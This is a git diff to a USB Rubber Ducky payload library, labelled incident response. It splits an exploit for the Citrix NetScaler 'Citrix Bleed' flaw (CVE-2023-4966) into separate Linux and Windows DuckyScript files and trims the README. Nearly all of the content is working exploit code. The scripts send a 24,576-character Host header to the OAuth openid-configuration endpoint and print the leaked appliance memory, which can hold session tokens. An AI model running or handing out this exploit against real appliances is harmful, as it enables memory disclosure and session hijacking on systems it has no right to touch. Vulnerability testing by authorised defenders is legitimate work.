diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md
index 3507828..d6bba9b 100644
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md
@@ -55,11 +55,6 @@ The sole configuration parameter that requires modification is the hostname, whi
 DEFINE #HOSTNAME 192.168.1.200
 ```
 
-## DuckyScript Extensions Used
-
-- **DETECT_READY**: Extension used to check whether the machine is ready to execute the payload without making unnecessary waits. [[2](#sources)]
-- **PASSIVE_WINDOWS_DETECT**: Extension used to check which operating system you are operating on so that you have a valid tool for both Windows and different systems, for instance GNU/Linux systems. [[3](#sources)]
-
 ## Payload Description Windows
 
 In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header.
@@ -172,9 +167,6 @@ After assigning execute permissions, the above command allows the user to run th
 ## Sources
 
 - [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
-- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
-- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
-- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
 
 ## Credits
 
@@ -196,4 +188,4 @@ After assigning execute permissions, the above command allows the user to run th
     </td>
   </tr>
 </table>
-</div>
\ No newline at end of file
+</div>
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt
new file mode 100644
index 0000000..93e878f
--- /dev/null
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt
@@ -0,0 +1,33 @@
+REM ################################################################################
+REM #                                                                              #
+REM # Title     : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966   #
+REM # Author	: Aleff                                                            #
+REM # Version	: 1.0                                                              #
+REM # Category	: incident-response                                                #
+REM # Target	: Citrix NetScaler ADV; NetScaler Gateway                          #
+REM #                                                                              #
+REM ################################################################################
+
+REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+DEFINE #HOSTNAME example
+
+DEALY 2000
+CTRL-ALT t
+DELAY 1000
+
+STRINGLN_BLOCK
+    header_value=$(yes a | head -n 24576 | tr -d '\n')
+
+    headers="-H 'Host:$header_value'"
+
+    response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+
+    if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
+        echo "--- Dumped memory ---"
+        echo "$response" | cut -c 131051-
+        echo "The #HOSTNAME is vulnerable!"
+        echo "---      End      ---"
+    else
+        echo "Could not dump memory"
+    fi
+END_STRINGLN
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
deleted file mode 100644
index 19176ea..0000000
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
+++ /dev/null
@@ -1,102 +0,0 @@
-REM ################################################################################
-REM #                                                                              #
-REM # Title     : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966   #
-REM # Author	: Aleff                                                            #
-REM # Version	: 1.0                                                              #
-REM # Category	: incident-response                                                #
-REM # Target	: Citrix NetScaler ADV; NetScaler Gateway                          #
-REM #                                                                              #
-REM ################################################################################
-
-REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-DEFINE #HOSTNAME example
-
-REM Detect what in what OS is running the payload
-EXTENSION PASSIVE_WINDOWS_DETECT
-    REM VERSION 1.1
-    REM AUTHOR: Korben
-
-    REM_BLOCK DOCUMENTATION
-        Windows fully passive OS Detection and passive Detect Ready
-        Includes its own passive detect ready.
-        Does not require additional extensions.
-
-        USAGE:
-            Extension runs inline (here)
-            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
-            boot delay
-            $_OS will be set to WINDOWS or NOT_WINDOWS
-            See end of payload for usage within payload
-    END_REM
-
-    REM CONFIGURATION:
-    DEFINE #MAX_WAIT 150
-    DEFINE #CHECK_INTERVAL 20
-    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
-    DEFINE #NOT_WINDOWS 7
-
-    $_OS = #NOT_WINDOWS
-
-    VAR $MAX_TRIES = #MAX_WAIT
-    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
-        DELAY #CHECK_INTERVAL
-        $MAX_TRIES = ($MAX_TRIES - 1)
-    END_WHILE
-    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
-        $_OS = WINDOWS
-    END_IF
-END_EXTENSION
-
-
-REM Payload content
-IF ($_OS == WINDOWS) THEN
-
-    REM Open a powershell
-    GUI r
-    DELAY 500
-    STRING powershell
-    ENTER
-    DELAY 1000
-
-    STRINGLN_BLOCK
-        $header_value = 'a' * 24576
-        $header_value = $header_value -replace "\n", ""
-
-        $headers="-H 'Host:$header_value'"
-
-        $headers = @{
-            'Host' = $header_value
-        }
-        $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
-        $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
-
-        if ($response.Substring(0, 3) -eq "200") {
-            Write-Host "--- Dumped memory ---"
-            $response.Substring(131050)  # 131051 - 1
-            Write-Host "The #HOSTNAME is vulnerable!"
-            Write-Host "---      End      ---"
-        } else {
-            Write-Host "Could not dump memory"
-        }
-    END_STRINGLN
-ELSE
-    CTRL-ALT t
-    DELAY 1000
-
-    STRINGLN_BLOCK
-        header_value=$(yes a | head -n 24576 | tr -d '\n')
-
-        headers="-H 'Host:$header_value'"
-
-        response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
-
-        if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
-            echo "--- Dumped memory ---"
-            echo "$response" | cut -c 131051-
-            echo "The #HOSTNAME is vulnerable!"
-            echo "---      End      ---"
-        else
-            echo "Could not dump memory"
-        fi
-    END_STRINGLN
-END_IF
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt
new file mode 100644
index 0000000..7cfb88d
--- /dev/null
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt
@@ -0,0 +1,42 @@
+REM ################################################################################
+REM #                                                                              #
+REM # Title     : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966   #
+REM # Author	: Aleff                                                            #
+REM # Version	: 1.0                                                              #
+REM # Category	: incident-response                                                #
+REM # Target	: Citrix NetScaler ADV; NetScaler Gateway                          #
+REM #                                                                              #
+REM ################################################################################
+
+REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+DEFINE #HOSTNAME example
+
+REM Open a powershell
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell
+ENTER
+DELAY 1000
+
+STRINGLN_BLOCK
+    $header_value = 'a' * 24576
+    $header_value = $header_value -replace "\n", ""
+
+    $headers="-H 'Host:$header_value'"
+
+    $headers = @{
+        'Host' = $header_value
+    }
+    $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+    $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
+
+    if ($response.Substring(0, 3) -eq "200") {
+        Write-Host "--- Dumped memory ---"
+        $response.Substring(131050)  # 131051 - 1
+        Write-Host "The #HOSTNAME is vulnerable!"
+        Write-Host "---      End      ---"
+    } else {
+        Write-Host "Could not dump memory"
+    }
+END_STRINGLN